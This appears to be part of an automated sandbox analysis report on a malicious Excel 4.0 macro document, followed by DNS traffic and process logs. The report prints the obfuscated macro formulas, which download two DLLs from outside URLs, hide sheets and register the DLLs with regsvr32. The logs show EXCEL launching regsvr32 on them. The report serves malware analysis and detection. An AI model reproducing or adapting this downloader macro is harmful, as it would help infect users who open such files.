                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,J,,CAL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,shadiinfo.com/2DP6mQeg/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,,,,,,,treasurechestcaribbean.com/pZ2Z61bqa/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 -s ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                    "=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BL28,'Doc3'!AY16)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL29&'Doc2'!BL30,'Doc3'!AY10)",,,,,,,,,,,,"=FORMULA('Doc2'!BO36,'Doc3'!AY13)",,,,,,"=FORMULA('Doc2'!BM28&'Doc2'!BM29&'Doc2'!BM30&""B"",'Doc3'!AY12)",,,,,,"=FORMULA(before.5.35.61.sheet!BP47,'Doc3'!AY17)",,,,,,"=FORMULA('Doc2'!BO37,'Doc3'!AY14)",,,,,,"=FORMULA('Doc2'!BK39,'Doc3'!AY18)",,,,,,"=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL32&'Doc2'!BJ31&'Doc2'!BL31&'Doc2'!BL34&'Doc2'!BJ32&""eA"",'Doc3'!AY11)",,,,,,"=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY14&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO53&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW11)",,,,,,,,,,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=RIGHT(""LdecvsbgvrsxLxrgxgL"",1)",,,,,,,,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO52&'Doc2'!BG33,'Doc3'!AW14)",,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO53&'Doc2'!BG33,'Doc3'!AW15)",,,,,,,,,,,"=""..\covi1.dll""","=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY13&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO52&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW10)=SUMXMY2(452354,45245)",,,,,"=""..\covi2.dll""",,,,,,,,,,,,,,,,,,,=GOTO('Doc3'!AW2),,,,,,,,,,,,,,,,,,,,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jun 11, 2021 15:03:35.524085045 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:35.574498892 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:37.522847891 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:37.576275110 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:38.964957952 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:39.026405096 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:40.098741055 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:40.157546997 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:43.984872103 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:44.035260916 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:46.270370960 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:46.320414066 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:47.533371925 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:47.546931982 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:47.596909046 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:47.619085073 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:48.159018993 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:48.233679056 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:49.184959888 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:49.235997915 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:49.248773098 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:49.287132978 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:50.231910944 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:50.293401957 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:50.997288942 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:51.047502041 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:52.095892906 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:52.148128033 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:52.279263020 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:52.340960979 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:53.349952936 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:53.401583910 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:54.432924032 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:54.482985973 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:03:56.329911947 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:03:56.383214951 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:01.329938889 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:01.380343914 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:02.289630890 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:02.342637062 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:03.758740902 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:03.828067064 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:04.022268057 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:04.085736990 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:05.224945068 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:05.278206110 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:06.273678064 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:06.326947927 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:07.188503027 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:07.241465092 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:08.145422935 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:08.198684931 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:42.619568110 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:42.680991888 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:04:50.452900887 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:04:50.527192116 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:04.681912899 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:04.828782082 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:05.701711893 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:05.763504982 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:06.841428041 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:06.902976036 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:07.357486010 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:07.418438911 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:08.026968002 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:08.162451982 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:08.175432920 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:08.250215054 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:08.781661987 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:08.835592031 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:09.508780003 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:09.567240000 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:10.392770052 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:10.456013918 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:11.251660109 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:11.310805082 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:11.767421961 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:11.825818062 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:29.479532957 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:29.553693056 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                    Jun 11, 2021 15:05:30.794128895 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                    Jun 11, 2021 15:05:30.852910042 CEST53642068.8.8.8192.168.2.4

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:15:03:46
                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x1250000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:15:03:49
                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                    Path:C:\Windows\splwow64.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                    Imagebase:0x7ff65ae00000
                                                                                                                                                    File size:130560 bytes
                                                                                                                                                    MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:15:04:01
                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 -s ..\covi1.dll
                                                                                                                                                    Imagebase:0x1040000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:15:04:02
                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 -s ..\covi2.dll
                                                                                                                                                    Imagebase:0x1040000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >